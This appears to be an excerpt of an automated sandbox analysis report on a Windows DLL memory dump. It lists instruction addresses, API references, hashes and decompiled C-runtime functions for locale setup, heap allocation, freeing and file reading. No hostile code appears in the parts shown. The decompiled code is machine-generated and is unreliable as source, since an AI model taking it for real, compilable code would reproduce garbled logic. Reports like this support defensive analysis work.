0x6d4d90c0
0x6d4d90c4
0x6d4d90c8
0x6d4d90ce
0x6d4d90d2
0x6d4d90e0
0x6d4d90e6
0x6d4d90e8
0x6d4d90f0
0x6d4d90f6
0x6d4d90f8
0x6d4d90f8
0x6d4d90ce
0x6d4d9102
0x6d4d9107
0x6d4d9109
0x6d4d9113
0x6d4d9115
0x6d4d911e
0x6d4d9122
0x6d4d9122
0x6d4d9122
0x6d4d9129
0x6d4d912f
0x6d4d9134
0x6d4d9136
0x6d4d913c
0x6d4d9142
0x6d4d914b
0x6d4d914e
0x6d4d9152
0x6d4d915e
0x6d4d915e
0x6d4d9160
0x6d4d9165
0x6d4d9169
0x6d4d916e
0x6d4d916e
0x6d4d9172
0x6d4d9178
0x6d4d917a
0x6d4d9183
0x6d4d9189
0x6d4d918d
0x6d4d9191
0x6d4d91a4
0x6d4d91a4
0x6d4d91a6
0x6d4d91a6
0x6d4d91aa
0x6d4d91af
0x6d4d921a
0x6d4d91b1
0x6d4d91bb
0x6d4d91c0
0x6d4d91e0
0x6d4d91e6
0x6d4d91e6
0x6d4d91e8
0x6d4d91ec
0x6d4d91c2
0x6d4d91c5
0x6d4d91c7
0x6d4d91d4
0x6d4d91d6
0x6d4d91d6
0x6d4d91f3
0x6d4d91f7
0x6d4d91fc
0x6d4d9200
0x6d4d9202
0x6d4d9209
0x6d4d920e
0x6d4d9214
0x6d4d9214
0x6d4d9200
0x6d4d921f
0x6d4d9221
0x6d4d9225
0x6d4d922e
0x6d4d9234
0x6d4d9238
0x6d4d9244
0x6d4d924b
0x6d4d924d
0x6d4d924f
0x6d4d9253
0x6d4d9253
0x6d4d9255
0x6d4d9255
0x6d4d9259
0x6d4d925b
0x6d4d925d
0x6d4d9268
0x6d4d926e
0x6d4d926e
0x6d4d926e
0x6d4d9275
0x6d4d927c
0x6d4d9282
0x6d4d929a
0x6d4d929a
0x6d4d929c
0x6d4d9284
0x6d4d9289
0x6d4d9292
0x6d4d9292
0x6d4d92ac
0x6d4d92b1
0x6d4d92b9
0x6d4d92bb
0x6d4d92c1
0x6d4d92c3
0x6d4d92c5
0x6d4d92cf
0x6d4d92d5
0x6d4d92d5
0x6d4d92d5
0x6d4d92d8
0x6d4d92e2
0x6d4d92e8
0x6d4d92f5
0x6d4d92f9
0x6d4d92fb
0x6d4d92ff
0x6d4d9305
0x6d4d9308
0x6d4d9332
0x6d4d933c
0x6d4d933e
0x6d4d934a
0x6d4d934a
0x6d4d934a
0x6d4d934c
0x00000000
0x6d4d930a
0x6d4d930b
0x6d4d930f
0x6d4d9313
0x6d4d9315
0x6d4d9350
0x6d4d9350
0x6d4d9353
0x00000000
0x6d4d9353
0x6d4d9319
0x6d4d931d
0x6d4d9323
0x6d4d9326
0x6d4d9329
0x00000000
0x6d4d9329
0x6d4d9308
0x6d4d935c
0x6d4d9365
0x6d4d9369
0x6d4d9370
0x6d4d9376
0x6d4d937a
0x6d4d9380
0x6d4d9384
0x6d4d9388
0x6d4d9390
0x6d4d9396
0x6d4d9396
0x6d4d9396
0x6d4d9399
0x6d4d93a4
0x6d4d93a6
0x6d4d93ae
0x6d4d93b3
0x6d4d93b9
0x6d4d93de
0x6d4d93e4
0x6d4d93e4
0x6d4d93bb
0x6d4d93be
0x6d4d93d8
0x6d4d93d8
0x6d4d93e6
0x6d4d93eb
0x6d4d93f0
0x6d4d93f9
0x6d4d93ff
0x6d4d9409
0x6d4d940e
0x6d4d9417
0x6d4d941a
0x6d4d941f
0x6d4d941f
0x6d4d9425
0x6d4d942b
0x6d4d9431
0x6d4d9436
0x6d4d9436
0x6d4d943c
0x6d4d943e
0x6d4d9442
0x6d4d9444
0x6d4d9444
0x6d4d944a
0x6d4d944a
0x6d4d944c
0x6d4d944c
0x6d4d9451
0x6d4d9454
0x6d4d9454
0x6d4d9465
0x6d4d9465
0x6d4d8b32
0x6d4d8b35
0x6d4d8b37
0x6d4d8b3f
0x6d4d8b41
0x6d4d8b45
0x6d4d8b4a
0x6d4d8b4f
0x6d4d8b53
0x6d4d8b5e
0x6d4d8b60
0x6d4d8b64
0x6d4d8b64
0x6d4d8b6a
0x6d4d8b70
0x6d4d8b76
0x6d4d8b78
0x6d4d8b7e
0x6d4d8b82
0x6d4d8b85
0x6d4d8b89
0x6d4d8b8d
0x6d4d8b91
0x6d4d8b95
0x00000000
0x6d4d8b10
0x6d4d8b10
0x6d4d8b12
0x00000000
0x00000000
0x6d4d8b14
0x6d4d8b1e
0x6d4d8b24
0x6d4d8b24
0x00000000
0x6d4d8b24

APIs

Sleep.KERNELBASE(000000C5), ref: 6D4D9129

Strings

}, xrefs: 6D4D88E5
P}Rm, xrefs: 6D4D8D13
O, xrefs: 6D4D8E46

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: Sleep
String ID: O$P}Rm$}
API String ID: 3472027048-1576422739
Opcode ID: 99ff78dde2168f124fb9784a8f95009a81636f4021a95c7b75f68ce570c2e5e3
Instruction ID: 246d44404dbd3a3072566b84ac432e1fadfed1f199b938aa3778e894fbdf5a3d
Opcode Fuzzy Hash: 99ff78dde2168f124fb9784a8f95009a81636f4021a95c7b75f68ce570c2e5e3
Instruction Fuzzy Hash: 0DA293756083918FCB18CF2CD5A466ABBF2BB8A304F064A2EE485C7B45E735D905CB85

Uniqueness

Uniqueness Score: -1.00%

Function 6D4773C0, Relevance: 3.0, APIs: 2, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 57%

			E6D4773C0(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t11;
				intOrPtr* _t19;
				intOrPtr _t21;
				void* _t22;
				void* _t23;

				_t23 = __eflags;
				_push(0);
				E6D490E9E(0x6d4fe9f4, __ebx, __edi, __esi);
				_t19 = __ecx;
				_push(8);
				 *__ecx = 0x6d5003bc;
				_t21 = E6D4906EF(__ecx, __edx, __esi, _t23);
				_t24 = _t21;
				if(_t21 == 0) {
					_t21 = 0;
					__eflags = 0;
				} else {
					 *(_t22 - 4) =  *(_t22 - 4) & 0x00000000;
					_push(1); // executed
					_t11 = E6D478A3D(__ebx, _t19, _t21, _t24); // executed
					 *((intOrPtr*)(_t21 + 4)) = _t11;
				}
				 *((intOrPtr*)(_t19 + 0x34)) = _t21;
				E6D4779F3(_t19);
				return E6D490E67(_t19);
			}

0x6d4773c0
0x6d4773c0
0x6d4773c7
0x6d4773cc
0x6d4773ce
0x6d4773d0
0x6d4773db
0x6d4773de
0x6d4773e0
0x6d4773f3
0x6d4773f3
0x6d4773e2
0x6d4773e2
0x6d4773e6
0x6d4773e8
0x6d4773ee
0x6d4773ee
0x6d4773f7
0x6d4773fa
0x6d477406

APIs

__EH_prolog3.LIBCMT ref: 6D4773C7
std::locale::_Init.LIBCPMT ref: 6D4773E8

Part of subcall function 6D478A3D: __EH_prolog3.LIBCMT ref: 6D478A44
Part of subcall function 6D478A3D: std::_Lockit::_Lockit.LIBCPMT ref: 6D478A4F
Part of subcall function 6D478A3D: std::locale::_Setgloballocale.LIBCPMT ref: 6D478A6A
Part of subcall function 6D478A3D: _Yarn.LIBCPMT ref: 6D478A80
Part of subcall function 6D478A3D: std::_Lockit::~_Lockit.LIBCPMT ref: 6D478AC0

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: bb1755bd667dabeda3f0ffc4b76487a112cf16b0911ac9e9dc30124a62cdd50d
Instruction ID: 0ea63edf627e76353725df574c67782d1d9c5ad45ce826082993449d712a0eb9
Opcode Fuzzy Hash: bb1755bd667dabeda3f0ffc4b76487a112cf16b0911ac9e9dc30124a62cdd50d
Instruction Fuzzy Hash: A7E0DF32E0D622CBD3309B6A8001FACAB81AB40B94FA2001ED7009F680CBB44C4087D2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BF58C, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E6D4BF58C(void* __ecx, signed int _a4, signed int _a8) {
				void* __esi;
				void* _t8;
				void* _t12;
				signed int _t13;
				void* _t15;
				signed int _t18;
				long _t19;

				_t15 = __ecx;
				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x6d540b4c, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E6D4CE068();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E6D4B41F9())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E6D4BA958(_t15, _t19, __eflags, _t19);
						_pop(_t15);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x6d4bf58c
0x6d4bf592
0x6d4bf597
0x6d4bf5a5
0x6d4bf5a5
0x6d4bf5ab
0x6d4bf5ad
0x6d4bf5ad
0x6d4bf5c4
0x6d4bf5cd
0x6d4bf5d5
0x00000000
0x00000000
0x6d4bf5b5
0x6d4bf5b7
0x6d4bf5d9
0x6d4bf5de
0x6d4bf5e4
0x00000000
0x6d4bf5e4
0x6d4bf5ba
0x6d4bf5bf
0x6d4bf5c0
0x6d4bf5c2
0x00000000
0x00000000
0x6d4bf5c2
0x00000000
0x6d4bf5c4
0x6d4bf59d
0x6d4bf5a3
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,6D4D78BF,00000000,?,6D4BDF0C,00000001,00000364,?,6D491D91,6D4D78BD,6D4D78BB,00000000,00000000,?,6D45140C,6D4D78BF), ref: 6D4BF5CD

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3dd9bd718c39b3764d17a80c53c7ca9aeb835cbf669aa4705957febe231c483d
Instruction ID: d7c3b021a5854b0cad3682e518e2aa0937773d0542cd68e65697bf0651ad2ccd
Opcode Fuzzy Hash: 3dd9bd718c39b3764d17a80c53c7ca9aeb835cbf669aa4705957febe231c483d
Instruction Fuzzy Hash: 02F0243D65F126A7EB015E2A8C04F1A3798AF717B0B228016EC1CD6281DF31EC0186F0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6D4CBC30, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4CBC30(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t2 = _t74 + 0x88; // 0x2afffffb
				_t25 =  *_t2;
				if(_t25 != 0 && _t25 != 0x6d5340c8) {
					_t3 = _t74 + 0x7c; // 0x500d8b6d
					_t45 =  *_t3;
					if(_t45 != 0 &&  *_t45 == 0) {
						_t4 = _t74 + 0x84; // 0x64958bc1
						_t46 =  *_t4;
						if(_t46 != 0 &&  *_t46 == 0) {
							E6D4C02CE(_t46);
							_t5 = _t74 + 0x88; // 0x2afffffb
							E6D4CBF44( *_t5);
						}
						_t6 = _t74 + 0x80; // 0x8a6d534a
						_t47 =  *_t6;
						if(_t47 != 0 &&  *_t47 == 0) {
							E6D4C02CE(_t47);
							_t7 = _t74 + 0x88; // 0x2afffffb
							E6D4CC438( *_t7);
						}
						_t8 = _t74 + 0x7c; // 0x500d8b6d
						E6D4C02CE( *_t8);
						_t9 = _t74 + 0x88; // 0x2afffffb
						E6D4C02CE( *_t9);
					}
				}
				_t10 = _t74 + 0x8c; // 0x22a04c2
				_t26 =  *_t10;
				if(_t26 != 0 &&  *_t26 == 0) {
					_t11 = _t74 + 0x90; // 0xfffb8785
					E6D4C02CE( *_t11 - 0xfe);
					_t12 = _t74 + 0x94; // 0xc3d81ff
					E6D4C02CE( *_t12 - 0x80);
					_t13 = _t74 + 0x98; // 0x266d534a
					E6D4C02CE( *_t13 - 0x80);
					_t14 = _t74 + 0x8c; // 0x22a04c2
					E6D4C02CE( *_t14);
				}
				_t15 = _t74 + 0x9c; // 0x88000016
				E6D4CBDA3( *_t15);
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0x6d4d795f
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x6d4d78e7
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6d5342b0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6D4C02CE(_t31);
							E6D4C02CE( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t22 = _t70 - 4; // 0x3afffffb
						_t29 =  *_t22;
						if(_t29 != 0 &&  *_t29 == 0) {
							E6D4C02CE(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6D4C02CE(_t74);
			}

APIs

___free_lconv_mon.LIBCMT ref: 6D4CBC74

Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF61
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF73
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF85
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBF97
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFA9
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFBB
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFCD
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFDF
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CBFF1
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC003
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC015
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC027
Part of subcall function 6D4CBF44: _free.LIBCMT ref: 6D4CC039

_free.LIBCMT ref: 6D4CBC69

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,6D4D78BF,00000000,6D4D78BF,00000000,?,6D4CCA29,6D4D78BF,00000007,6D4D78BF,?,6D4CBDC8,6D4D78BF), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(6D4D78BF,?,6D4CC724,6D4D78BF,00000000,6D4D78BF,00000000,?,6D4CCA29,6D4D78BF,00000007,6D4D78BF,?,6D4CBDC8,6D4D78BF,6D4D78BF), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CBC8B
_free.LIBCMT ref: 6D4CBCA0
_free.LIBCMT ref: 6D4CBCAB
_free.LIBCMT ref: 6D4CBCCD
_free.LIBCMT ref: 6D4CBCE0
_free.LIBCMT ref: 6D4CBCEE
_free.LIBCMT ref: 6D4CBCF9
_free.LIBCMT ref: 6D4CBD31
_free.LIBCMT ref: 6D4CBD38
_free.LIBCMT ref: 6D4CBD55
_free.LIBCMT ref: 6D4CBD6D

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: e30783bc724e0ab22ef163a5af8ac72329d5a4bc0ad61ec0d560dc0186cae01b
Instruction ID: 723a9988ff43810c956a1fc028de71134e3d95526f5fa90ba1f9796108423535
Opcode Fuzzy Hash: e30783bc724e0ab22ef163a5af8ac72329d5a4bc0ad61ec0d560dc0186cae01b
Instruction Fuzzy Hash: 6E314B796083069FEB209B75D944F6A77E9EF00325F31482DE959DB250EF35AC80CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CCA10, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4CCA10(intOrPtr _a4) {
				void* _t18;
				intOrPtr _t45;

				_t45 = _a4;
				if(_t45 != 0) {
					E6D4CC6F6(_t45, 7);
					_t2 = _t45 + 0x1c; // 0x6d4d78db
					E6D4CC6F6(_t2, 7);
					_t3 = _t45 + 0x38; // 0x6d4d78f7
					E6D4CC6F6(_t3, 0xc);
					_t4 = _t45 + 0x68; // 0x6d4d7927
					E6D4CC6F6(_t4, 0xc);
					_t5 = _t45 + 0x98; // 0x6d4d7957
					E6D4CC6F6(_t5, 2);
					_t6 = _t45 + 0xa0; // 0xfffb7885
					E6D4C02CE( *_t6);
					_t7 = _t45 + 0xa4; // 0x2b1e75ff
					E6D4C02CE( *_t7);
					_t8 = _t45 + 0xa8; // 0x534a280d
					E6D4C02CE( *_t8);
					_t9 = _t45 + 0xb4; // 0x6d4d7973
					E6D4CC6F6(_t9, 7);
					_t10 = _t45 + 0xd0; // 0x6d4d798f
					E6D4CC6F6(_t10, 7);
					_t11 = _t45 + 0xec; // 0x6d4d79ab
					E6D4CC6F6(_t11, 0xc);
					_t12 = _t45 + 0x11c; // 0x6d4d79db
					E6D4CC6F6(_t12, 0xc);
					_t13 = _t45 + 0x14c; // 0x6d4d7a0b
					E6D4CC6F6(_t13, 2);
					_t14 = _t45 + 0x154; // 0xb9f0692a
					E6D4C02CE( *_t14);
					_t15 = _t45 + 0x158; // 0x33000014
					E6D4C02CE( *_t15);
					_t16 = _t45 + 0x15c; // 0x2bfe8bc0
					E6D4C02CE( *_t16);
					_t17 = _t45 + 0x160; // 0x534a3035
					return E6D4C02CE( *_t17);
				}
				return _t18;
			}

APIs

Part of subcall function 6D4CC6F6: _free.LIBCMT ref: 6D4CC71F

_free.LIBCMT ref: 6D4CCA5E

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,6D4D78BF,00000000,6D4D78BF,00000000,?,6D4CCA29,6D4D78BF,00000007,6D4D78BF,?,6D4CBDC8,6D4D78BF), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(6D4D78BF,?,6D4CC724,6D4D78BF,00000000,6D4D78BF,00000000,?,6D4CCA29,6D4D78BF,00000007,6D4D78BF,?,6D4CBDC8,6D4D78BF,6D4D78BF), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CCA69
_free.LIBCMT ref: 6D4CCA74
_free.LIBCMT ref: 6D4CCAC8
_free.LIBCMT ref: 6D4CCAD3
_free.LIBCMT ref: 6D4CCADE
_free.LIBCMT ref: 6D4CCAE9

Strings

|, xrefs: 6D4CCA8F

Memory Dump Source

Source File: 00000006.00000002.901200137.000000006D451000.00000020.00020000.sdmp, Offset: 6D450000, based on PE: true

Associated: 00000006.00000002.901192498.000000006D450000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901492823.000000006D500000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.901632344.000000006D534000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901643555.000000006D535000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.901687062.000000006D53F000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.901704728.000000006D55B000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: |
API String ID: 776569668-2272152440
Opcode ID: 9d7fa3d03ade73cbe32b9155f84779464575b1a55af6e10987faf18e024615a8
Instruction ID: 05dd7c52da67924be9ad83aaee827d802a456890a2019beb5be96e66a56c2e14
Opcode Fuzzy Hash: 9d7fa3d03ade73cbe32b9155f84779464575b1a55af6e10987faf18e024615a8
Instruction Fuzzy Hash: 4511AC79A49B08AAEA20EBB0CD05FCB779EAF00304F45081CB7A9B6050CB64FC4086C2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C5B5F, Relevance: 13.8, APIs: 9, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6D4C5B5F(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E6D4B41E6();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E6D4B41F9())) = 9;
						L59:
						_t145 = E6D4B40C8();
						goto L60;
					}
					__eflags = _t213 -  *0x6d540938; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x6d540738 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E6D4C1817(_t224, _t158);
								E6D4C02CE(0);
								E6D4C02CE(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E6D4C17FC(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x6d540738 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x6d540738 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x6d540738 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x6d540738 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x6d540738 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x6d540738 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x6d540738 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E6D4D1498(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E6D4B41C3(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E6D4B41F9())) = 9;
											 *(E6D4B41E6()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x6d540738 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E6D4C565B();
												} else {
													_t176 = E6D4C59CB();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E6D4C587B(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x6d540738 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
